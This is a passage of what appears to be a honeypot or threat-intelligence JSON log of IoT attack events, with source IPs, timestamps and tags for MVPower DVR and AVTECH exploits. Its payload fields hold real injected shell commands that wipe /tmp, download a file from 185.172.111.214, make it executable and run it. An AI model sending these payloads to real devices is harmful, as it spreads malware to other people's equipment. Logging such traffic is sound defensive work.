1438.           "category": "IoT",
1439.           "description": "MVPower DVR (JAWS Web Server) RCE"
1440.         }
1441.       ],
1442.       "event_count": 1,
1443.       "first_seen": "2020-06-02T14:08:38Z",
1444.       "last_seen": "2020-06-02T14:08:38Z"
1445.     },
1446.     {
1447.       "event_id": "16eeeadb884ab067e2bfc4716e87d20a838973a92dfd4876903d4465e9a81ca1",
1448.       "source_ip_address": "95.218.92.20",
1449.       "country": "SA",
1450.       "user_agent": "Hello, world",
1451.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1452.       "post_data": "",
1453.       "target_port": 80,
1454.       "protocol": "tcp",
1455.       "tags": [
1456.         {
1457.           "cve": "",
1458.           "category": "IoT",
1459.           "description": "MVPower DVR (JAWS Web Server) RCE"
1460.         }
1461.       ],
1462.       "event_count": 1,
1463.       "first_seen": "2020-06-02T12:20:47Z",
1464.       "last_seen": "2020-06-02T12:20:47Z"
1465.     },
1466.     {
1467.       "event_id": "af7fe9e242c67f8f69bfeafa8dd82f56446df140aeb1ca7283043f44dedb402e",
1468.       "source_ip_address": "24.218.229.102",
1469.       "country": "US",
1470.       "user_agent": "Hello, world",
1471.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1472.       "post_data": "",
1473.       "target_port": 80,
1474.       "protocol": "tcp",
1475.       "tags": [
1476.         {
1477.           "cve": "",
1478.           "category": "IoT",
1479.           "description": "MVPower DVR (JAWS Web Server) RCE"
1480.         }
1481.       ],
1482.       "event_count": 1,
1483.       "first_seen": "2020-06-02T04:30:25Z",
1484.       "last_seen": "2020-06-02T04:30:25Z"
1485.     },
1486.     {
1487.       "event_id": "98ae27d3e7bba44679945b2b44d1e8577cb0e6beb5f4bc4e3111c5d9d0e34a6c",
1488.       "source_ip_address": "122.176.27.17",
1489.       "country": "IN",
1490.       "user_agent": "Hello, world",
1491.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1492.       "post_data": "",
1493.       "target_port": 80,
1494.       "protocol": "tcp",
1495.       "tags": [
1496.         {
1497.           "cve": "",
1498.           "category": "IoT",
1499.           "description": "MVPower DVR (JAWS Web Server) RCE"
1500.         }
1501.       ],
1502.       "event_count": 1,
1503.       "first_seen": "2020-06-02T00:43:28Z",
1504.       "last_seen": "2020-06-02T00:43:28Z"
1505.     },
1506.     {
1507.       "event_id": "aef5fcda2410f405079b120ae518e80968453c696502a8a5bbe12ef0b960b805",
1508.       "source_ip_address": "80.15.136.218",
1509.       "country": "FR",
1510.       "user_agent": "Hello, world",
1511.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1512.       "post_data": "",
1513.       "target_port": 80,
1514.       "protocol": "tcp",
1515.       "tags": [
1516.         {
1517.           "cve": "",
1518.           "category": "IoT",
1519.           "description": "MVPower DVR (JAWS Web Server) RCE"
1520.         }
1521.       ],
1522.       "event_count": 1,
1523.       "first_seen": "2020-06-01T22:48:00Z",
1524.       "last_seen": "2020-06-01T22:48:00Z"
1525.     },
1526.     {
1527.       "event_id": "5972d92049bb5fa0e3f95853034afc0225ce129711ad127d88f3b77265c9c213",
1528.       "source_ip_address": "42.61.13.174",
1529.       "country": "SG",
1530.       "user_agent": "Hello, world",
1531.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1532.       "post_data": "",
1533.       "target_port": 80,
1534.       "protocol": "tcp",
1535.       "tags": [
1536.         {
1537.           "cve": "",
1538.           "category": "IoT",
1539.           "description": "MVPower DVR (JAWS Web Server) RCE"
1540.         }
1541.       ],
1542.       "event_count": 1,
1543.       "first_seen": "2020-06-01T10:16:00Z",
1544.       "last_seen": "2020-06-01T10:16:00Z"
1545.     },
1546.     {
1547.       "event_id": "6e04d00b68510cd9e732554af70cefaa1da35f7ffaf112e7b325798b68e24b17",
1548.       "source_ip_address": "116.206.59.195",
1549.       "country": "BD",
1550.       "user_agent": "Hello, world",
1551.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1552.       "post_data": "",
1553.       "target_port": 80,
1554.       "protocol": "tcp",
1555.       "tags": [
1556.         {
1557.           "cve": "",
1558.           "category": "IoT",
1559.           "description": "MVPower DVR (JAWS Web Server) RCE"
1560.         }
1561.       ],
1562.       "event_count": 1,
1563.       "first_seen": "2020-06-01T08:43:00Z",
1564.       "last_seen": "2020-06-01T08:43:00Z"
1565.     },
1566.     {
1567.       "event_id": "c6cf520402a73bb76fe2a9c7088dff549091493db575f34252bb592c27a1d02b",
1568.       "source_ip_address": "103.78.141.187",
1569.       "country": "ID",
1570.       "user_agent": "Hello, world",
1571.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1572.       "post_data": "",
1573.       "target_port": 80,
1574.       "protocol": "tcp",
1575.       "tags": [
1576.         {
1577.           "cve": "",
1578.           "category": "IoT",
1579.           "description": "MVPower DVR (JAWS Web Server) RCE"
1580.         }
1581.       ],
1582.       "event_count": 1,
1583.       "first_seen": "2020-06-01T07:54:47Z",
1584.       "last_seen": "2020-06-01T07:54:47Z"
1585.     },
1586.     {
1587.       "event_id": "5f6ee736fb8c7f46625298061777c5069aa75f5721ee36620c41589571633572",
1588.       "source_ip_address": "193.142.146.34",
1589.       "country": "NL",
1590.       "user_agent": "Snickers-Avtech",
1591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1592.       "post_data": "",
1593.       "target_port": 10243,
1594.       "protocol": "tcp",
1595.       "tags": [
1596.         {
1597.           "cve": "",
1598.           "category": "IoT",
1599.           "description": "AVTECH Exploit"
1600.         }
1601.       ],
1602.       "event_count": 1,
1603.       "first_seen": "2020-06-01T05:45:24Z",
1604.       "last_seen": "2020-06-01T05:45:24Z"
1605.     },
1606.     {
1607.       "event_id": "a3f26f223fa2a0b50d39b40704ef31c18bacdcde40744234bde3b65bf763d5e6",
1608.       "source_ip_address": "193.142.146.34",
1609.       "country": "NL",
1610.       "user_agent": "Snickers-Avtech",
1611.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1612.       "post_data": "",
1613.       "target_port": 4242,
1614.       "protocol": "tcp",
1615.       "tags": [
1616.         {
1617.           "cve": "",
1618.           "category": "IoT",
1619.           "description": "AVTECH Exploit"
1620.         }
1621.       ],
1622.       "event_count": 1,
1623.       "first_seen": "2020-06-01T05:45:23Z",
1624.       "last_seen": "2020-06-01T05:45:23Z"
1625.     },
1626.     {
1627.       "event_id": "ba01391da3cb191b4679dcb16de977e0de50418852e8eb0e7f2bf4c34b0bc5a6",
1628.       "source_ip_address": "193.142.146.34",
1629.       "country": "NL",
1630.       "user_agent": "Snickers-Avtech",
1631.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1632.       "post_data": "",
1633.       "target_port": 2480,
1634.       "protocol": "tcp",
1635.       "tags": [
1636.         {
1637.           "cve": "",
1638.           "category": "IoT",
1639.           "description": "AVTECH Exploit"
1640.         }
1641.       ],
1642.       "event_count": 1,
1643.       "first_seen": "2020-06-01T05:45:22Z",
1644.       "last_seen": "2020-06-01T05:45:22Z"
1645.     },
1646.     {
1647.       "event_id": "662d06408fd6b1f4f1259f18f019364e6d76d2b7003e5991b4e01bd59439ec2f",
1648.       "source_ip_address": "193.142.146.34",
1649.       "country": "NL",
1650.       "user_agent": "Snickers-Avtech",
1651.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1652.       "post_data": "",
1653.       "target_port": 9000,
1654.       "protocol": "tcp",
1655.       "tags": [
1656.         {
1657.           "cve": "",
1658.           "category": "IoT",
1659.           "description": "AVTECH Exploit"
1660.         }
1661.       ],
1662.       "event_count": 1,
1663.       "first_seen": "2020-06-01T05:45:20Z",
1664.       "last_seen": "2020-06-01T05:45:20Z"
1665.     },
1666.     {
1667.       "event_id": "c103369e84a5e346d71fa1c0a2f6ee1e09ab4e379372c7261e1a434c0cd9a563",
1668.       "source_ip_address": "193.142.146.34",
1669.       "country": "NL",
1670.       "user_agent": "Snickers-Avtech",
1671.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1672.       "post_data": "",
1673.       "target_port": 4242,
1674.       "protocol": "tcp",
1675.       "tags": [
1676.         {
1677.           "cve": "",
1678.           "category": "IoT",
1679.           "description": "AVTECH Exploit"
1680.         }
1681.       ],
1682.       "event_count": 1,
1683.       "first_seen": "2020-06-01T05:45:15Z",
1684.       "last_seen": "2020-06-01T05:45:15Z"
1685.     },
1686.     {
1687.       "event_id": "1161e89cb6883518d2c135c1a585b61b531dd8d1377d26911bb223aa29a4f158",
1688.       "source_ip_address": "193.142.146.34",
1689.       "country": "NL",
1690.       "user_agent": "Snickers-Avtech",
1691.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1692.       "post_data": "",
1693.       "target_port": 2480,
1694.       "protocol": "tcp",
1695.       "tags": [
1696.         {
1697.           "cve": "",
1698.           "category": "IoT",
1699.           "description": "AVTECH Exploit"
1700.         }
1701.       ],
1702.       "event_count": 1,
1703.       "first_seen": "2020-06-01T05:45:14Z",
1704.       "last_seen": "2020-06-01T05:45:14Z"
1705.     },
1706.     {
1707.       "event_id": "b231ee200b361ae70f5062eae618c1cb41d4c31e9eb78099c15e079b7ddc6a05",
1708.       "source_ip_address": "193.142.146.34",
1709.       "country": "NL",
1710.       "user_agent": "Snickers-Avtech",
1711.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1712.       "post_data": "",
1713.       "target_port": 6511,
1714.       "protocol": "tcp",
1715.       "tags": [
1716.         {
1717.           "cve": "",
1718.           "category": "IoT",
1719.           "description": "AVTECH Exploit"
1720.         }
1721.       ],
1722.       "event_count": 1,
1723.       "first_seen": "2020-06-01T05:45:14Z",
1724.       "last_seen": "2020-06-01T05:45:14Z"
1725.     },
1726.     {
1727.       "event_id": "7cf11168cee6cbd54eecaaff3ad771bc9a6b41db5a6ff0908b85d243af583443",
1728.       "source_ip_address": "193.142.146.34",
1729.       "country": "NL",
1730.       "user_agent": "Snickers-Avtech",
1731.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1732.       "post_data": "",
1733.       "target_port": 9000,
1734.       "protocol": "tcp",
1735.       "tags": [
1736.         {
1737.           "cve": "",
1738.           "category": "IoT",
1739.           "description": "AVTECH Exploit"
1740.         }
1741.       ],
1742.       "event_count": 1,
1743.       "first_seen": "2020-06-01T05:45:12Z",
1744.       "last_seen": "2020-06-01T05:45:12Z"
1745.     },
1746.     {
1747.       "event_id": "f0b182c190e74e2c199db3535427b4420abd10f3de20077edb5e0e84b1c3551e",
1748.       "source_ip_address": "193.142.146.34",
1749.       "country": "NL",
1750.       "user_agent": "Snickers-Avtech",
1751.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1752.       "post_data": "",
1753.       "target_port": 6511,
1754.       "protocol": "tcp",
1755.       "tags": [
1756.         {
1757.           "cve": "",
1758.           "category": "IoT",
1759.           "description": "AVTECH Exploit"
1760.         }
1761.       ],
1762.       "event_count": 1,
1763.       "first_seen": "2020-06-01T05:45:06Z",
1764.       "last_seen": "2020-06-01T05:45:06Z"
1765.     },
1766.     {
1767.       "event_id": "1ec55e1b56163ec36393dedde9c1bcb5dc9fff90eaa363eaf8615f87fc110a8e",
1768.       "source_ip_address": "193.142.146.34",
1769.       "country": "NL",
1770.       "user_agent": "Snickers-Avtech",
1771.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1772.       "post_data": "",
1773.       "target_port": 8443,
1774.       "protocol": "tcp",
1775.       "tags": [
1776.         {
1777.           "cve": "",
1778.           "category": "IoT",
1779.           "description": "AVTECH Exploit"
1780.         }
1781.       ],
1782.       "event_count": 2,
1783.       "first_seen": "2020-06-01T05:44:09Z",
1784.       "last_seen": "2020-06-01T05:44:59Z"
1785.     },
1786.     {
1787.       "event_id": "8e012bf46d2a4a2abcfeda43973ced6f88b34c025d9165f4c10e1a1e64a6b63c",
1788.       "source_ip_address": "193.142.146.34",
1789.       "country": "NL",
1790.       "user_agent": "Snickers-Avtech",
1791.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1792.       "post_data": "",
1793.       "target_port": 5001,
1794.       "protocol": "tcp",
1795.       "tags": [
1796.         {
1797.           "cve": "",
1798.           "category": "IoT",
1799.           "description": "AVTECH Exploit"
1800.         }
1801.       ],
1802.       "event_count": 1,
1803.       "first_seen": "2020-06-01T05:44:58Z",
1804.       "last_seen": "2020-06-01T05:44:58Z"
1805.     },
1806.     {
1807.       "event_id": "859ad4fce9c90c1ebd2d8270a8ec6be245e74c407a4bca3a945c0783ebbbc320",
1808.       "source_ip_address": "193.142.146.34",
1809.       "country": "NL",
1810.       "user_agent": "Snickers-Avtech",
1811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1812.       "post_data": "",
1813.       "target_port": 8443,
1814.       "protocol": "tcp",
1815.       "tags": [
1816.         {
1817.           "cve": "",
1818.           "category": "IoT",
1819.           "description": "AVTECH Exploit"
1820.         }
1821.       ],
1822.       "event_count": 2,
1823.       "first_seen": "2020-06-01T05:44:02Z",
1824.       "last_seen": "2020-06-01T05:44:51Z"
1825.     },
1826.     {
1827.       "event_id": "5ece2229e8f2215c582f182485e8d3e201df49bdcf8b657cb2704b744840d6e1",
1828.       "source_ip_address": "193.142.146.34",
1829.       "country": "NL",
1830.       "user_agent": "Snickers-Avtech",
1831.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1832.       "post_data": "",
1833.       "target_port": 5001,
1834.       "protocol": "tcp",
1835.       "tags": [
1836.         {
1837.           "cve": "",
1838.           "category": "IoT",
1839.           "description": "AVTECH Exploit"
1840.         }
1841.       ],
1842.       "event_count": 1,
1843.       "first_seen": "2020-06-01T05:44:49Z",
1844.       "last_seen": "2020-06-01T05:44:49Z"
1845.     },
1846.     {
1847.       "event_id": "5f4be9346625d67853f7e789a5c9eb7d46face509c854f456635ca81473a453e",
1848.       "source_ip_address": "193.142.146.34",
1849.       "country": "NL",
1850.       "user_agent": "Snickers-Avtech",
1851.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1852.       "post_data": "",
1853.       "target_port": 9002,
1854.       "protocol": "tcp",
1855.       "tags": [
1856.         {
1857.           "cve": "",
1858.           "category": "IoT",
1859.           "description": "AVTECH Exploit"
1860.         }
1861.       ],
1862.       "event_count": 1,
1863.       "first_seen": "2020-06-01T05:44:39Z",
1864.       "last_seen": "2020-06-01T05:44:39Z"
1865.     },
1866.     {
1867.       "event_id": "cf21c55e071832fd9de69e8d5b767d09a5f40114731b615a38027b26e65b6f7e",
1868.       "source_ip_address": "193.142.146.34",
1869.       "country": "NL",
1870.       "user_agent": "Snickers-Avtech",
1871.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1872.       "post_data": "",
1873.       "target_port": 7001,
1874.       "protocol": "tcp",
1875.       "tags": [
1876.         {
1877.           "cve": "",
1878.           "category": "IoT",
1879.           "description": "AVTECH Exploit"
1880.         }
1881.       ],
1882.       "event_count": 1,
1883.       "first_seen": "2020-06-01T05:44:36Z",
1884.       "last_seen": "2020-06-01T05:44:36Z"
1885.     },
1886.     {
1887.       "event_id": "b229ad09239529805d582c9ee14d24e1518cd8cb834373ea7ebbb823ffbb95e9",
1888.       "source_ip_address": "193.142.146.34",
1889.       "country": "NL",
1890.       "user_agent": "Snickers-Avtech",
1891.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1892.       "post_data": "",
1893.       "target_port": 9200,
1894.       "protocol": "tcp",
1895.       "tags": [
1896.         {
1897.           "cve": "",
1898.           "category": "IoT",
1899.           "description": "AVTECH Exploit"
1900.         }
1901.       ],
1902.       "event_count": 1,
1903.       "first_seen": "2020-06-01T05:44:32Z",
1904.       "last_seen": "2020-06-01T05:44:32Z"
1905.     },
1906.     {
1907.       "event_id": "ab3a242b4a56a7b65ee675e57a6594a6bb81a75ae3ed670715baccb6866ade1e",
1908.       "source_ip_address": "193.142.146.34",
1909.       "country": "NL",
1910.       "user_agent": "Snickers-Avtech",
1911.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1912.       "post_data": "",
1913.       "target_port": 9002,
1914.       "protocol": "tcp",
1915.       "tags": [
1916.         {
1917.           "cve": "",
1918.           "category": "IoT",
1919.           "description": "AVTECH Exploit"
1920.         }
1921.       ],
1922.       "event_count": 1,
1923.       "first_seen": "2020-06-01T05:44:31Z",
1924.       "last_seen": "2020-06-01T05:44:31Z"
1925.     },
1926.     {
1927.       "event_id": "ae7dbb5456509a7f57ab33f1ed317b1fa98641f53eb727579c84a3d1ca62d4dd",
1928.       "source_ip_address": "193.142.146.34",
1929.       "country": "NL",
1930.       "user_agent": "Snickers-Avtech",
1931.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1932.       "post_data": "",
1933.       "target_port": 7001,
1934.       "protocol": "tcp",
1935.       "tags": [
1936.         {
1937.           "cve": "",
1938.           "category": "IoT",
1939.           "description": "AVTECH Exploit"
1940.         }
1941.       ],
1942.       "event_count": 1,
1943.       "first_seen": "2020-06-01T05:44:29Z",
1944.       "last_seen": "2020-06-01T05:44:29Z"
1945.     },
1946.     {
1947.       "event_id": "ae60c76aae428a51720a703b5a014e2994acc760f8ea13f06112451407d0b38b",
1948.       "source_ip_address": "193.142.146.34",
1949.       "country": "NL",
1950.       "user_agent": "Snickers-Avtech",
1951.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
1952.       "post_data": "",
1953.       "target_port": 9200,
1954.       "protocol": "tcp",
1955.       "tags": [
1956.         {
1957.           "cve": "",
1958.           "category": "IoT",
1959.           "description": "AVTECH Exploit"
1960.         }
1961.       ],
1962.       "event_count": 1,
1963.       "first_seen": "2020-06-01T05:44:24Z",
1964.       "last_seen": "2020-06-01T05:44:24Z"
1965.     },
1966.     {
1967.       "event_id": "1a8bb257dc92febe557a59cf5ba1cedf72f1c536b6a27548aa24547a0463ac3b",
1968.       "source_ip_address": "193.142.146.34",
1969.       "country": "NL",
1970.       "user_agent": "Snickers-Avtech",
1971.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1972.       "post_data": "",
1973.       "target_port": 8843,
1974.       "protocol": "tcp",
1975.       "tags": [
1976.         {
1977.           "cve": "",
1978.           "category": "IoT",
1979.           "description": "AVTECH Exploit"
1980.         }
1981.       ],
1982.       "event_count": 1,
1983.       "first_seen": "2020-06-01T05:36:43Z",
1984.       "last_seen": "2020-06-01T05:36:43Z"
1985.     },
1986.     {
1987.       "event_id": "3df3f83cbfac3eb99897de01c61b3238d2090353c5a06341dc3cf2e9c7fd261f",
1988.       "source_ip_address": "193.142.146.34",
1989.       "country": "NL",
1990.       "user_agent": "Snickers-Avtech",
1991.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
1992.       "post_data": "",
1993.       "target_port": 8843,
1994.       "protocol": "tcp",
1995.       "tags": [
1996.         {
1997.           "cve": "",
1998.           "category": "IoT",
1999.           "description": "AVTECH Exploit"
2000.         }
2001.       ],
2002.       "event_count": 1,
2003.       "first_seen": "2020-06-01T05:36:37Z",
2004.       "last_seen": "2020-06-01T05:36:37Z"
2005.     },
2006.     {
2007.       "event_id": "74e2742a32b7ded053c2b0634aacdbc340217877cf78ac6cd6590cf1e90c1c82",
2008.       "source_ip_address": "193.142.146.34",
2009.       "country": "NL",
2010.       "user_agent": "Snickers-Avtech",
2011.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2012.       "post_data": "",
2013.       "target_port": 5222,
2014.       "protocol": "tcp",
2015.       "tags": [
2016.         {
2017.           "cve": "",
2018.           "category": "IoT",
2019.           "description": "AVTECH Exploit"
2020.         }
2021.       ],
2022.       "event_count": 2,
2023.       "first_seen": "2020-06-01T05:23:15Z",
2024.       "last_seen": "2020-06-01T05:36:29Z"
2025.     },
2026.     {
2027.       "event_id": "aa5f86d1d2d810d9ea8f1c2e3f55838d2ed433f5d597782fa4f702da7184fce4",
2028.       "source_ip_address": "193.142.146.34",
2029.       "country": "NL",
2030.       "user_agent": "Snickers-Avtech",
2031.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2032.       "post_data": "",
2033.       "target_port": 5222,
2034.       "protocol": "tcp",
2035.       "tags": [
2036.         {
2037.           "cve": "",
2038.           "category": "IoT",
2039.           "description": "AVTECH Exploit"
2040.         }
2041.       ],
2042.       "event_count": 2,
2043.       "first_seen": "2020-06-01T05:23:01Z",
2044.       "last_seen": "2020-06-01T05:36:23Z"
2045.     },
2046.     {
2047.       "event_id": "daf80a2aa7d2c1f6a6d2c3679a955675e5026d0f6867c95364ea482b59cdb6ed",
2048.       "source_ip_address": "193.142.146.34",
2049.       "country": "NL",
2050.       "user_agent": "Snickers-Avtech",
2051.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2052.       "post_data": "",
2053.       "target_port": 16993,
2054.       "protocol": "tcp",
2055.       "tags": [
2056.         {
2057.           "cve": "",
2058.           "category": "IoT",
2059.           "description": "AVTECH Exploit"
2060.         }
2061.       ],
2062.       "event_count": 4,
2063.       "first_seen": "2020-06-01T05:07:04Z",
2064.       "last_seen": "2020-06-01T05:35:51Z"
2065.     },
2066.     {
2067.       "event_id": "95704a3507aec8d164989d316765225922444160d602e6308f46a6288f8fbbf6",
2068.       "source_ip_address": "193.142.146.34",
2069.       "country": "NL",
2070.       "user_agent": "Snickers-Avtech",
2071.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2072.       "post_data": "",
2073.       "target_port": 16993,
2074.       "protocol": "tcp",
2075.       "tags": [
2076.         {
2077.           "cve": "",
2078.           "category": "IoT",
2079.           "description": "AVTECH Exploit"
2080.         }
2081.       ],
2082.       "event_count": 4,
2083.       "first_seen": "2020-06-01T05:06:56Z",
2084.       "last_seen": "2020-06-01T05:35:45Z"
2085.     },
2086.     {
2087.       "event_id": "73659f5cdfc354283121c3e221d9c5e7c7b862d31bcf9896d963f60b4adb74be",
2088.       "source_ip_address": "193.142.146.34",
2089.       "country": "NL",
2090.       "user_agent": "Snickers-Avtech",
2091.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2092.       "post_data": "",
2093.       "target_port": 3105,
2094.       "protocol": "tcp",
2095.       "tags": [
2096.         {
2097.           "cve": "",
2098.           "category": "IoT",
2099.           "description": "AVTECH Exploit"
2100.         }
2101.       ],
2102.       "event_count": 2,
2103.       "first_seen": "2020-06-01T05:27:28Z",
2104.       "last_seen": "2020-06-01T05:34:48Z"
2105.     },
2106.     {
2107.       "event_id": "11427ae986267fa3fa48afc0f9f67e89026d14fac4c8b0e2a607f9ff4678651b",
2108.       "source_ip_address": "193.142.146.34",
2109.       "country": "NL",
2110.       "user_agent": "Snickers-Avtech",
2111.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2112.       "post_data": "",
